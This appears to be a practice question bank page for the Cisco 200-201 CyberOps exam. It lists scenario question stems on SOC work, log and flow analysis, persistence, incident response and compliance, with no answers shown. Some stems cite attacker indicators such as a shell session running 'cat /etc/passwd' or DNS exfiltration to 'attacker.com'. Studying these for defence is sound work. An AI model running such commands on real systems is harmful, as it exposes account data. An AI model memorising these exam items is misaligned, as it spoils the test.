Hard802During network intrusion analysis, an analyst observes a TCP connection with the SYN flag set but no subsequent ACK. This pattern is indicative of:
Easy803A SOC Tier 1 analyst receives an alert for a potential malware infection. What is the primary responsibility of the Tier 1 analyst?
Easy804A SOC Tier 3 analyst is performing advanced threat analysis. Which TWO activities are typical for this tier?
Medium805A NetFlow analysis shows that a single internal IP sent 10 GB of data to an external IP within one hour, whereas the baseline for that host is typically 100 MB per day. Which type of activity does this indicate?
Medium806An analyst is investigating a Linux web server that is exhibiting unusual outbound network traffic. The analyst runs 'lsof -i' and notices that the process 'apache2' has an established connection to an external IP address on port 4444. Further investigation shows that a file named 'update.php' in the web root contains obfuscated code. Which type of compromise does this most likely represent?
Medium807A security analyst is investigating a Linux server that is exhibiting unusual outbound network traffic. The analyst runs 'netstat -tulpn' and observes a listening service on TCP port 4444, but the process name is 'sshd'. The analyst knows that SSH normally listens on port 22. Which of the following is the most likely explanation for this finding?
Hard808A security analyst is reviewing Zeek connection logs and sees the following entry: '192.168.1.10:12345 > 10.0.0.1:80 (tcp) duration 0.001 sec, service http, bytes 60, state S0'. Based on the state 'S0', what does this indicate about the connection?
Hard809Which TWO of the following are typical indicators of a C2 beaconing communication?
Easy810An analyst is reviewing Windows Event Logs and sees Event ID 4625. What does this event indicate?
Easy811An organization is conducting a risk assessment and wants to assign numerical values to the likelihood and impact of risks. Which type of risk assessment is being performed?
Hard812An analyst is investigating a Windows system where a suspicious executable is running. Using Process Explorer, the analyst observes that the process 'svchost.exe' has a parent process of 'cmd.exe'. What is the significance of this parent-child relationship?
Medium813A security analyst is examining a Windows 10 host that is suspected of being compromised. The analyst runs `wmic process get name,processid,executablepath,commandline` and notices a process named `svchost.exe` with an executable path of `C:\Users\Public\svchost.exe`. Which conclusion is most accurate?
Hard814A security analyst is investigating an incident where an employee received an email that appeared to be from the company's IT department, requesting the employee to verify their account by clicking a link and entering their credentials. The employee complied, and later the attacker used those credentials to access the corporate VPN. Which combination of attack types best describes this incident?
Hard815An analyst investigates a suspected data exfiltration event and captures outbound traffic from a compromised host. The traffic uses HTTPS to an unfamiliar external domain and shows consistent large uploads at regular intervals. Which two indicators would most strongly support the conclusion that this is automated exfiltration rather than normal user browsing? (Choose two.)
Medium816During a security audit, an analyst discovers that several employees have shared their login credentials with colleagues to expedite work. Which policy enforcement mechanism would be most effective in preventing this behavior?
Easy817In the Cyber Kill Chain, which phase involves sending a malicious attachment to a targeted user?
Easy818A security analyst is reviewing the organization's password policy. The policy currently requires passwords to be at least 8 characters and changed every 60 days. The analyst recommends aligning with NIST SP 800-63B guidelines. Which change should the analyst recommend?
Easy819A change management policy requires that all network configuration changes be approved by a change advisory board (CAB) before implementation. An urgent security vulnerability requires an immediate firewall rule change to block an active exploit. What should the network administrator do?
Medium820Refer to the exhibit. A security analyst notices repeated login failures. According to the company's security policy, what action should be taken?
Medium821During the Cyber Kill Chain, which phase involves sending a malicious attachment to a target user via email?
Easy822An analyst examining a PCAP sees an internal host sending ICMP echo requests where the payload length is consistently 1,100 bytes and the payload bytes change on every packet, while the destination is an external IP that returns echo replies of normal size. The host has no monitoring tool installed and no legitimate reason to send large ICMP. Which technique is most likely being used?
Hard823A security manager is preparing an incident response plan for a retail company. The plan must define how the organization will handle incidents consistently and must satisfy auditors. Which TWO elements are essential components of an incident response policy? (Choose two.)
Hard824A security analyst is using Zeek to analyze network traffic. Which Zeek log would be most useful for identifying HTTP requests to a known malicious domain?
Medium825A security operations center is building detection rules for man-in-the-middle attacks on its internal network. The team wants to identify techniques an attacker on the same Layer 2 segment could use to intercept or redirect traffic between two hosts. (Choose two.)
Medium826A security analyst discovers that an attacker used a publicly available tool to scan a company's network for open ports and services. What type of attack is this?
Easy827A security analyst is reviewing an incident in which an attacker gained initial access to a corporate workstation by exploiting a vulnerability in a browser plugin. After gaining access, the attacker moved laterally to a file server and exfiltrated data. The analyst must map these activities to the cyber kill chain. Which phase of the kill chain does the browser plugin exploitation represent?
Hard828A security analyst is evaluating the security posture of a new web application. The analyst needs to identify which TWO of the following are examples of security controls that fall under the category of technical controls. (Choose two.)
Medium829An analyst is reviewing web server logs and sees the following entries: 'GET /admin/login.php HTTP/1.1' returning 404, followed by 'GET /admin/login.html' returning 404, then 'GET /admin/login.asp' returning 200. Which TWO observations are most relevant?
Hard830An organization implements encryption for all sensitive data at rest and in transit to prevent unauthorized access. Which element of the CIA triad is being primarily addressed?
Easy831A SOC analyst is reviewing network telemetry from Cisco Stealthwatch and notices a host inside the corporate network initiating repeated outbound connections to a single external IP address. Each connection is short-lived (less than 5 seconds) and occurs at irregular intervals, with varying destination ports. The analyst suspects command-and-control activity. Which approach would best confirm this suspicion using available telemetry?
Medium832A financial institution must comply with PCI DSS requirements for handling cardholder data. A security administrator is asked to implement the control that directly addresses the requirement to protect stored cardholder data. Which technology should the administrator deploy to meet this specific PCI DSS requirement?
Easy833A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?
Medium834A company's security policy states that all remote access must be through a VPN. An employee complains that the VPN is too slow and asks for an exception to access a specific internal server directly over the internet. What should the security analyst recommend?
Medium835A network analyst notices a high volume of traffic from a single external IP address to multiple internal hosts on port 443. The traffic includes incomplete TCP handshakes. Which type of reconnaissance is being performed?
Medium836A network administrator is creating a baseline for normal traffic patterns. Which of the following should be considered typical for a web server during business hours?
Medium837An incident responder is analyzing a Windows machine for evidence of malware persistence. Which TWO registry keys are commonly abused to achieve automatic execution at user logon?
Medium838After containing a security incident, the incident response team eradicates the malware and restores systems from clean backups. Which phase of the NIST SP 800-61 Rev 2 process does this represent?
Medium839In Wireshark, an analyst follows a TCP stream and sees plaintext usernames and passwords. Which protocol is likely in use?
Medium840An analyst detects multiple SMB authentication attempts from a single internal host to several other internal hosts using NTLM hashes instead of plaintext passwords. Which technique is most likely being used?
Medium841A junior analyst is reviewing a packet capture and sees a workstation repeatedly sending ICMPv4 Type 8 packets to an external IP address with varying payload sizes. The analyst wants to confirm whether this activity is a covert channel. Which characteristic of the ICMP traffic would most strongly suggest that the ICMP payload is being used to exfiltrate data?
Easy842A security analyst is reviewing the risk associated with a new cloud service. The service provider stores data in multiple countries, and the data includes personal information of EU citizens. The analyst must ensure compliance with GDPR. Which principle of GDPR is most directly relevant to this scenario?
Medium843An analyst is examining a Linux system for persistence mechanisms. Which of the following files should be reviewed to detect cron-based persistence?
Medium844In the context of risk management, which term describes the risk that remains after implementing security controls?
Easy845An attacker sends an email posing as the company's IT department, asking employees to click a link and enter their credentials. Which type of social engineering attack is this?
Medium846A threat hunter reviews Cisco Stealthwatch flow data and sees an internal server sending periodic 300-byte outbound flows to an external IP every 60 seconds, with consistent packet sizes and no matching inbound response beyond TCP acknowledgments. The server's DNS queries for that IP resolve through a newly registered domain. Which monitoring approach best characterizes this activity as beaconing rather than normal application traffic?
Hard847Which component of the NIST Cybersecurity Framework involves taking action to stop an ongoing attack?
Easy848A Zeek connection log shows a high number of connections from a single internal IP to many different external IPs on port 25, with small payload sizes. Which behavior is most likely indicated?
Hard849A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?
Medium850A security auditor reviews a company's security policies and finds that the password policy requires a minimum length of 8 characters and complexity including uppercase, lowercase, digit, and special character. However, the policy does not mandate password expiration. Which of the following is the most significant risk due to this omission?
Hard851During an intrusion analysis, a SOC analyst reviews logs showing an outbound connection from an internal host to an external IP at 03:00 AM every 60 seconds. The traffic is HTTPS to a suspicious domain with a high entropy name. Which phase of the Cyber Kill Chain does this activity represent?
Medium852A security analyst is triaging an alert about a user downloading a suspicious file. According to the NIST SP 800-61 Rev 2 incident response process, in which phase does initial triage occur?
Easy853You are a security operations analyst for a medium-sized enterprise. The company's security policy requires that all endpoint devices have antivirus software installed and updated. During a routine check, you find that a group of 50 laptops used by the sales team have not received antivirus updates for over three months. The policy also states that any non-compliant devices must be quarantined from the network until they are remediated. The sales team manager argues that quarantining the laptops will disrupt critical sales activities. The company's incident response policy has a clause that allows for temporary exceptions in business-critical situations, but requires approval from the CISO. What is the best course of action?
Medium854A security analyst is reviewing the organization's security policies and notices that the Acceptable Use Policy (AUP) is outdated. The analyst is asked to identify key elements that should be included in an effective AUP. Which two elements are essential components of an AUP? (Choose two.)
Medium855A security policy mandates that all network devices must have logging enabled and that logs must be reviewed regularly. Which TWO practices are essential for effective log review?
Medium856During an incident response, an analyst checks for persistence mechanisms and finds an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the most likely purpose of this registry key?
Medium857Which THREE are essential components of a security monitoring strategy? (Choose three.)
Medium858An organization's data classification policy defines four levels: Public, Internal, Confidential, and Restricted. An employee accidentally sends an email containing customer payment card information (PCI) to the entire company mailing list. The data should have been classified as which level?
Easy859An organization must comply with a regulation that requires protecting the privacy of EU citizens' personal data. Which compliance framework applies?
Hard860During an incident investigation, the IR team collects evidence from a compromised server. The evidence must be admissible in court. Which documentation is essential to maintain the chain of custody?
Hard861A security analyst is reviewing a Wireshark capture and notices a large number of TCP SYN packets sent to multiple ports on a single host from the same source IP. Which type of network activity is most likely being observed?
Easy862A security analyst is investigating a potential brute force attack. Which SIEM correlation rule would best detect this activity?
Medium863An analyst suspects a Windows workstation is beaconing to a command-and-control server. The host's DNS cache contains an entry for a domain that resolves to an IP address, but the analyst cannot find any active network connection or process associated with that domain. Which Windows artifact should the analyst examine to determine whether a process previously resolved this domain and when?
Medium864A SIEM correlation rule triggers an alert when more than 10 failed login attempts from the same source IP occur within 60 seconds. Which attack is this rule designed to detect?
Medium865Which Linux log file is most appropriate for reviewing failed SSH login attempts?
Medium866A security analyst is using Cisco Umbrella and notices a high volume of DNS queries from a single internal host to randomly generated domain names that do not resolve. The queries are for domains like 'a1b2c3d4.com', 'e5f6g7h8.net', etc. What type of malicious activity is most likely occurring?
Hard867Which THREE are required steps in a proper incident response procedure? (Choose three.)
Hard868An analyst is triaging an alert generated by Cisco Secure Network Analytics (Stealthwatch) showing a host inside the network communicating with a known command-and-control IP. The analyst wants to determine whether the communication has already resulted in data theft. Which additional telemetry source would provide the most direct evidence of successful exfiltration?
Hard869Refer to the exhibit. A Windows security log shows several events with Event ID 4625 (failed logon). What type of attack is indicated?
Easy870An analyst is examining a PE file and notices that the 'TimeDateStamp' in the optional header is 0x00000000. What does this suggest?
Medium871A security analyst is investigating an alert from a Windows system log that shows multiple failed logon attempts for the same user account within a short period, followed by a successful logon. Which type of attack does this pattern suggest?
Easy872Which of the following is a primary goal of the CIA triad?
Easy873Which TWO are best practices for managing SIEM alerts to reduce false positives? (Choose two.)
Hard874A junior analyst is asked to review a Linux server for evidence of unauthorized access. They want to see a chronological record of authentication-related messages, including successful and failed logins, generated by the system's authentication services. Which file should the analyst examine?
Easy875An intrusion analyst is analyzing a series of alerts from a network-based IDS. The alerts are triggered by the signature 'OVERFLOW-ICMP-ECHO' with a payload size of 65535 bytes. The source IP is a trusted internal server. What is the most likely explanation?
Hard876A network security analyst is reviewing firewall logs and sees repeated denied inbound connection attempts from various external IP addresses to TCP port 3389 on several internal hosts. Which type of activity does this most likely represent?
Easy877Refer to the exhibit. Based on the intrusion event, what is the likely intent of the traffic?
Hard878A security policy states that all portable media must be encrypted. An employee loses a USB drive containing customer data. The drive was encrypted with AES-256. Which of the following is true regarding policy compliance?
Hard879A network security analyst is configuring a SPAN session on a Cisco switch so that a Cisco Firepower sensor can inspect traffic between the internal user VLAN and the internet-facing router. The switch has a single physical uplink carrying that traffic. Which configuration goal must the analyst keep in mind to ensure the sensor receives complete sessions?
Easy880An analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?
Easy881A NetFlow analysis shows a single internal host communicating with many external IP addresses on port 443, but the traffic volumes are very low (small packets). What is the most likely explanation?
Easy882In the OSI model, which layer is primarily targeted by a SYN flood attack?
Easy883A Linux analyst wants to identify all listening TCP ports on a system. Which command is most appropriate?
Easy884In a PKI, what is the role of a Certificate Authority (CA)?
Hard885A network engineer is deploying a Cisco Next-Generation IPS (NGIPS) in inline mode. The security team wants to ensure that the device can block malicious traffic while also providing contextual information about the attack. Which of the following Cisco NGIPS features provides detailed information about the attack and the target, including vulnerability mapping?
Hard886A NetFlow report shows that host 10.0.0.5 has sent 1 GB of data to external IP 198.51.100.10 over port 443 in the last hour, while other hosts average 100 MB. This anomaly is most indicative of:
Hard887An analyst is examining network alerts for lateral movement. Which TWO of the following are typical indicators of lateral movement using SMB?
Medium888Which protocol and port combination is commonly used for secure remote administration of network devices?
Easy889An analyst is investigating an incident and needs to determine the source of a piece of malware. The analyst finds that the malware uses a domain generation algorithm to contact command-and-control servers. Which term best describes this capability?
Medium890A security analyst observes a NetFlow record showing a single internal IP communicating with many external IPs on port 445 within seconds. This pattern is indicative of:
Medium891A SOC analyst reviewing a packet capture notices that a single internal host has initiated hundreds of short-lived TCP sessions to the same external web server over the past hour, and every session completed a full three-way handshake before being torn down with FIN/ACK. No single session transferred more than a few kilobytes. Which traffic characteristic should the analyst use to classify this activity?
Medium892Which THREE of the following are common types of malware?
Medium893During an incident response, an analyst finds evidence of lateral movement. Which THREE of the following are common techniques used for lateral movement?
Hard894An analyst reviews an alert that triggered on a network signature for 'shellcode' in a payload. The payload contains a sequence of NOP sleds followed by executable code. Which type of exploitation technique does this indicate?
Medium895An organization is developing an Acceptable Use Policy (AUP). Which of the following topics is typically covered in an AUP?
Medium896Which best practice helps ensure accurate network intrusion analysis when reviewing logs from multiple sources?
Easy897During PCAP analysis, a security analyst observes the following pattern: a series of TCP SYN packets to multiple ports on a target, followed by RST packets from the target for closed ports. Which TWO characteristics describe this scan?
Hard898A company is developing a new security policy for cloud storage. Which principle should be the foundation of the policy to ensure data confidentiality and integrity?
Medium899A security analyst detects a host infected with ransomware on the corporate network. According to incident response procedures, what should be the first action?
Easy900During a security incident, the incident handler identifies that the breach involves personally identifiable information (PII) of customers. Which role is primarily responsible for determining if legal notification requirements apply?
Medium901Which data source provides the most detailed information about the application layer payload in network traffic?
Easy902An analyst notices that a DNS query for 'www.attacker.com' contains a long subdomain with Base64-encoded data. This activity is observed every 5 minutes. What exfiltration technique is most likely in use?
Medium903A security analyst needs to verify that a downloaded software update has not been tampered with. The update's publisher provides a file containing a hash value. Which process should the analyst use to verify integrity?
Hard904An organization is developing a new cloud-based application. The security policy requires that all data be encrypted in transit and at rest. Which combination of controls meets this requirement?
Hard905A security analyst at a financial services company is reviewing the organization's security program. The CISO wants to ensure that the confidentiality, integrity, and availability of information assets are protected by administrative, physical, and technical controls. Which security concept is the CISO describing?
Easy906A security analyst is investigating a network breach. Which TWO activities are examples of passive reconnaissance? (Choose two.)
Medium907A healthcare organization uses an online patient portal where patients can view their medical records. Recently, it was discovered that patient records were being modified by an unauthorized insider, and the system suffered a ransomware attack that encrypted the database, making it inaccessible for three days. Which TWO security principles were primarily violated? (Choose two.)
Easy908An organization is required to protect cardholder data. Which compliance framework applies to this requirement?
Medium909A security policy requires that all data at rest be encrypted. Which TWO of the following are considered best practices for implementing encryption?
Medium910An analyst inspects a PCAP and finds a TCP stream where the client and server exchange data in alternating small chunks, each packet's payload is roughly 40 to 60 bytes, and the conversation lasts over two hours with consistent inter-packet delays of about ten seconds. The destination port is 443 but the payload is not TLS. Which conclusion is best supported?
Hard911You are a SOC analyst monitoring traffic on a corporate network. The network uses a next-generation firewall (NGFW) with intrusion prevention system (IPS). You receive an alert that the IPS detected a SQL injection attempt against the internal web application server (10.0.1.10) from an external IP (203.0.113.5). The IPS action was set to "alert" only, not "drop". Further investigation shows that the web server logs indicate the SQL injection succeeded and data was exfiltrated to 203.0.113.5. The web application is a custom application developed in-house. The database server (10.0.1.20) contains customer PII. Which of the following is the BEST immediate action to contain the incident?
Medium912A SOC analyst is correlating multiple data sources after a suspected web application compromise on an internet-facing server. The analyst has access to web server logs, firewall logs, and endpoint detection and response (EDR) telemetry. Which TWO log sources or record types would most directly help identify the initial exploitation attempt and the subsequent post-exploitation activity? (Choose two.)
Hard913A SOC Tier 2 analyst is investigating an alert that was escalated from Tier 1. The analyst suspects the malware is using a new variant of ransomware. What is the most appropriate next step for the Tier 2 analyst?
Medium914A junior analyst is triaging a Windows workstation that users report is running slowly. The analyst suspects a malicious process is persisting by masquerading as a legitimate Windows service. Which built-in Windows tool should the analyst use to view services, their binary paths, and their current state without installing additional software?
Easy915Which TWO of the following are indicators of a potential data exfiltration attempt?
Medium916An analyst is investigating a Linux host and runs 'cat /proc/1234/cmdline'. What information does this provide?
Medium917After a security incident, the IR team holds a lessons learned meeting. Which THREE activities are part of the Post-Incident Activity phase?
Medium918A SOC analyst is correlating events in the SIEM after an alert fired for suspicious PowerShell execution on a workstation. The analyst wants to identify additional evidence that would support a ransomware pre-encryption hypothesis. Which two telemetry findings would most strongly support that hypothesis? (Choose two.)
Medium919An analyst is examining a suspicious PE file. The file's entropy is very high (close to 8.0) and the import table is almost empty. What does this indicate?
Hard920An analyst is investigating a suspected FTP brute-force attack. The logs show numerous failed login attempts from a single external IP to multiple user accounts on an internal FTP server. Which two additional pieces of evidence would best confirm a brute-force attack? (Choose two.)
Medium921A security analyst at a financial firm is investigating a potential data breach. The company uses Cisco Firepower NGFW and Stealthwatch for network visibility. Over the past week, an internal server with IP 10.10.10.50 has been sending large amounts of data to an external IP 203.0.113.55 on TCP port 443. The Stealthwatch flow records show that the server typically communicates with only internal hosts and a few known external update servers. The analyst checks the Firepower events and sees no alerts for this traffic. The server is running a custom web application that handles financial transactions. The analyst suspects data exfiltration. What should the analyst do next?
Hard922Which port is used by RDP (Remote Desktop Protocol) and is a common target for brute force attacks?
Easy923An analyst uses Volatility's pstree plugin on a memory dump. The output shows that process 'winlogon.exe' has a child process 'cmd.exe' that is not typical. What is the most likely explanation?
Hard924During a forensic examination of a Linux system, an analyst wants to check for persistence mechanisms. Which file or directory should be examined to find user-specific cron jobs that may have been added by an attacker?
Hard925A security analyst is reviewing the organization's business continuity plan (BCP) after a recent power outage disrupted operations. The analyst notes that the plan includes an alternate processing site and a backup generator but lacks other key components. Which TWO additional elements should the analyst recommend including to improve the BCP? (Choose two.)
Medium926A company's security policy requires that privileged accounts use multi-factor authentication for all administrative access. An auditor finds that a database administrator logs in with a username and password only, then uses a shared service account with a static password for automation. Which policy violation represents the greater risk to the organization?
Hard927An analyst is reviewing a Windows event log and sees Event ID 4625 repeated many times for the same user account from different source workstations within a short period. Which activity does this most likely indicate?
Easy928During a vulnerability assessment, a security team discovers that a web application allows users to upload files without proper validation. An attacker could upload a malicious file and execute it on the server. Which type of vulnerability is this?
Hard929An analyst is investigating a Windows host that likely has malware persistence via the registry. Which TWO registry hives are commonly used to store Run keys for user logon persistence? (Select 2)
Medium930Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)
Hard931A security operations center analyst is reviewing a vulnerability scan report for a web server. The report identifies that the server is running an outdated version of Apache HTTP Server with a known remote code execution vulnerability. The analyst needs to classify this finding. Which term best describes this vulnerability?
Medium932A network administrator is tasked with creating a security policy for handling sensitive data. Which of the following is the most critical element to include?
Easy933In Windows, prefetch files (C:\Windows\Prefetch\*.pf) are used by the system to speed up application loading. How can an analyst leverage prefetch files during host-based analysis?
Medium934A security analyst is reviewing PCAP data and sees a TCP stream with interactive shell commands such as 'whoami', 'ls -la', and 'cat /etc/passwd'. The session appears to be bidirectional with a remote IP. Which type of attack is most likely occurring?
Medium935An analyst is investigating a Windows host for malware persistence. Which TWO registry locations are commonly abused for persistence by modifying the 'Run' key? (Select TWO)
Medium936Which tool can be used to extract files from a PCAP file for further analysis?
Medium937An analyst is reviewing IDS alerts and sees an alert with signature name 'ET POLICY Suspicious inbound to MySQL port 3306'. The source IP is external and destination is an internal database server. What is the best immediate action?
Medium938A security engineer is setting up a Snort rule to detect FTP traffic where the source IP is not from the internal network. Which Snort rule header correctly specifies the action, protocol, source, and destination?
Medium939Which of the following is the CORRECT order of the NIST SP 800-61 Rev 2 incident response lifecycle phases?
Easy940Which TWO are common sources of security event data in a Security Information and Event Management (SIEM) system?
Easy941During which phase of the NIST SP 800-61 Rev 2 incident response process would the incident response team conduct initial triage and determine whether an event qualifies as an incident?
Easy942An analyst is investigating a potential compromise using Indicators of Compromise (IoCs). Which TWO of the following are valid types of IoCs?
Medium943An analyst sees a Snort alert with the message 'ET POLICY Outbound connection to known malicious IP'. What does this indicate?
Medium944A network administrator configures an IPS to drop packets that match a signature for SQL injection. However, legitimate web traffic is being blocked. What is the most likely cause?
Medium945A SIEM correlation rule triggers when a user account is created and then added to a privileged group within 10 minutes. Which activity does this rule detect?
Hard946A SOC analyst is tuning Cisco Firepower intrusion policies and reviewing alert metadata to prioritize response. Which TWO alert attributes most directly indicate that a detected event represents a successful compromise rather than a blocked attempt? (Choose two.)
Medium947An analyst needs to establish a normal traffic pattern baseline for the network. Which activity is most appropriate for this purpose?
Easy948Which security policy defines the process for reporting discovered security vulnerabilities to the organization?
Easy949Which TWO characteristics are typical of host-based intrusion detection systems (HIDS) compared to network-based intrusion detection systems (NIDS)?
Hard950An organization wants to protect sensitive data at rest and in transit. Which THREE cryptographic methods can provide confidentiality? (Choose three.)
Medium951An analyst is investigating a Windows workstation that exhibits suspicious outbound network traffic. The analyst suspects a malicious process is injecting code into a legitimate process. Which of the following Windows Event Log sources would MOST likely contain evidence of process creation and image loading that could reveal the injection?
Hard952A network analyst is reviewing firewall logs and sees repeated inbound connections from a single external IP to TCP port 445 on multiple internal hosts over a short period. The connections are followed by SMB negotiation attempts. Which activity does this most likely represent?
Easy953A financial services firm must retain security audit logs for a period specified by its regulator and be able to produce them during an examination. Which action BEST ensures the logs remain trustworthy and available for that purpose?
Medium954Which two Sysmon Event IDs are most commonly associated with code injection techniques?
Easy955An analyst detects traffic from an internal host that periodically sends small DNS queries to a domain with high entropy subdomains (e.g., 'a3k9f2.example.com'). The domain is not on any blocklist, and the query intervals are consistent every 60 seconds. Which technique is most likely being used?
Medium956A retail company is updating its security policy framework and needs to align its security controls with a widely recognized U.S. federal standard. The company wants a publication that provides a comprehensive catalog of security and privacy controls for federal information systems and organizations. Which NIST publication should the security team reference?
Medium957A security analyst receives an alert for a known malware signature in an outbound file transfer. After investigation, the file is confirmed as benign software. This alert is classified as:
Easy958An organization is implementing a threat intelligence sharing program. They want to exchange both structured indicators and full reports with other members of their ISAC. Which combination of standards/protocols should they choose? (Choose two.)
Hard959An analyst is triaging a host that antivirus flagged for a file named svchost.exe running from C:\Users\Public\Downloads. The file has a valid digital signature issued to a legitimate software publisher, and the hash matches a known-good installer component. The process is making outbound SMB connections to several internal servers. Which action best reflects sound security monitoring practice?
Hard960A security analyst is creating a network baseline for normal traffic patterns. Which TWO metrics should be included to detect anomalies?
Easy961An attacker sends a fraudulent email that appears to come from the company's IT department, requesting that the recipient click a link and enter their login credentials. Which type of social engineering attack is this?
Medium962Which compliance standard specifically applies to organizations that handle credit card information?
Medium963An analyst observes an alert triggered by a single SYN packet to a closed port. The packet did not complete a TCP handshake. What type of attack does this most likely indicate?
Easy964A security engineer is analyzing a recent data breach. Which TWO are examples of active reconnaissance techniques? (Select two.)
Medium965During an incident response, an analyst identifies a PCAP containing an HTTP POST request to a suspicious external IP with a large payload. The response is not typical for web applications. What type of activity is most likely occurring?
Medium966A security analyst notices repeated failed login attempts from a single IP address against multiple user accounts. What is the best immediate action to take?
Easy967A company is implementing a new data classification policy. The policy defines three levels: Public, Internal, and Confidential. An employee accidentally emails a spreadsheet marked 'Confidential' to an external partner. The email system automatically encrypts all outbound emails containing 'Confidential' classification. Which security control is being demonstrated?
Hard968An analyst is analyzing a PCAP and sees multiple ICMP port unreachable responses from a target host when scanning UDP ports. What does this indicate about the scanned ports?
MediumOther domains
All 200-201 exam domains
Frequently asked questions
- What does the scenario questions domain cover on the 200-201 exam?
- scenario questions questions test whether you can apply the concept in context, not just recognise a definition.
- How many questions are in this domain?
- This page lists all 968 scenario questions questions in the 200-201 question bank. The actual exam draws from this domain proportionally to its weighting in the official exam blueprint.
- What is the best way to practise this domain?
- Start with a short focused session (10 questions) to identify gaps, then work through explanations. Repeat with a longer session once the weak areas feel solid.
- Can I practise only scenario questions questions?
- Yes — the session launcher on this page filters questions to this domain only. Choose any session length for inline explanations and scoring.